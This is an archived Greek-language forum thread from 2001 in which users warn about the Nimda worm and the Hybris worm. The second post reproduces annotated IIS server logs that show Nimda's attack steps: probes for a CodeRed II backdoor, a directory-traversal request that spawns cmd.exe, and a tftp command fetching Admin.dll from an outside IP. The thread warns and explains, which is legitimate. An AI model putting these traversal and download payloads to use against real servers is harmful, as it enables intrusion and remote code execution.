Burner Δημοσ. 21 Σεπτεμβρίου 2001 Δημοσ. 21 Σεπτεμβρίου 2001 Nέος ιός με απρόβλεπτες συνέπειες (μολύνει, όχι με έναν,αλλά με 16 διαφορετικούς τρόπους) <BR>Ηδη,έχει προσβάλει υπολογιστές σε όλον τον κόσμο, και στην Ελλάδα. <BR>Το όνομα του: Nimda (αλλά μπορούμε και να τον βρούμε και ως Code Rainbow, Minda και Concept Virus) <BR>Του αρεέσουν: <BR>1)desktop υπολογιστές και<BR>2)IIS Servers <BR>Μεταδίδεται μέσω e-mail χωρίς κείμενο, τυχαίας επικεφαλίδας, με επισυναπτόμενο (attached) αρχείο ονομασίας readme.exe, το οποίο μπορεί να φαίνεται σαν αρχείο ήχου .wav. Από τη στιγμή που ο χρήστης ανοίξει το μολυσμένο αρχείο, ο ιός θα αποστείλει αντίγραφα του εαυτού του σε όλες τις διευθύνσεις του address book. Σε υπολογιστές με παλιότερες εκδόσεις του Internet Explorer, το επισυναπτόμενο αρχείο εκτελείται αυτόματα, όταν ο χρήστης δει απλά το e-mail μέσω του preview. <P>Ευτυχώς βρέθηκε γρήγορα η λύση του !!!!!! <A HREF="http://www.symantec.com/avcenter/venc/data/[email protected]" TARGET=_blank>http://www.symantec.com/avcenter/venc/data/[email protected]</A>
viper25 Δημοσ. 21 Σεπτεμβρίου 2001 Δημοσ. 21 Σεπτεμβρίου 2001 Deite to parakatw log apo IIS Server <BR>kai ton tropo pou xrhsimopoih <P>The entry below is where it is checking to see if the CodeRed II backdoor is there<P>o 2001-09-18 13:25:33 xxx.255.255.255 - xxx.255.255.255 80 GET /scripts/root.exe /c+dir 404 <P>o In the case above it was not, and so a 404 (File not found) was returned<P>· Another check in a different place for the CodeRed II backdoor<P>o 2001-09-18 13:25:33 xxx.255.255.255 - xxx.255.255.255 80 GET /MSADC/root.exe /c+dir 403 <P>o In the case above, permissions where denied on this directory so, a 403 (Permissions Error) was returned<P>· Now, it tries the Web Folder Traversal vulnerability<P>o 2001-09-18 13:25:33 xxx.255.255.255 - xxx.255.255.255 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 200 <P>o In this case, this is where they got in. We can see that a 200 (Ok) was returned, meaning IIS allowed them to spawn a cmd.exe and do a directory listing. <P>o It is here that Nimda has gained system level access.<P>· Once inside, it then launches FTP to download ADMIN.DLL<P>o 2001-09-18 13:25:34 xxx.255.255.255 - xxx.255.255.255 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+tftp%20-i%20157.57.159.67%20GET%20Admin.dll%20c:\Admin.dll 502 <P>· It then tries to issue commands directly to ADMIN.DLL to do the rest of the dirty work<P>o 2001-09-18 13:25:34 xxx.255.255.255 - xxx.255.255.255 80 GET /scripts/..%5c../Admin.dll - 500 -<P>
Super Moderators billdanos Δημοσ. 21 Σεπτεμβρίου 2001 Super Moderators Δημοσ. 21 Σεπτεμβρίου 2001 Telika problem ehoun osoi hrisimopoioun explorer paliotero apo thn ekdosh 5 h kai thn ekdosh 5.5 hwris to service pack. Apo oti fainetai h ekdosh 6 den ehei kapoio problem! <BR> Shmera omws eihame kai alles exelixeis: Hrthan sto mail mou sto yahoo kamia 10 mails ta opoia htan newsletters apo to <A HREF="http://www.linuxmotor.com" TARGET=_blank>www.linuxmotor.com</A> (sto opoio pote den grafthka). Sta 4 apo ta 10 yphrhe mesa ena arheio JNPDJBJN.EXE to opoio perieihe to W95.Hybris.worm!!! Eytyhws to prolave o norton alla kai to Zone Alarm pou allaxe thn katalhxh tou arheiou. Ta problhmata omws den stamathsan ekei! Sto telos tou newsletter yphrhe link gia na vgeis apo thn lista twn paralhptwn, pragma pou opws htan fysiko kanan oloi osoi parelavan auto to mail! To mail omws pou estelnan anti na paei sto linuxmotor.com ekane kyklous se olous tous allous paralhptes!!! To apotelesma einai na erhontai dekades mails sto account mou... (prin ligo esvhsa kamia 100...). Opote an synehistei auto mallon einai wra egataleipsw to yahoo!<BR> Kante update kathe mera sta antivirus! O norton katevazei updates shedon kathe mera! to idio kai to Cleaner!
Προτεινόμενες αναρτήσεις
Αρχειοθετημένο
Αυτό το θέμα έχει αρχειοθετηθεί και είναι κλειστό για περαιτέρω απαντήσεις.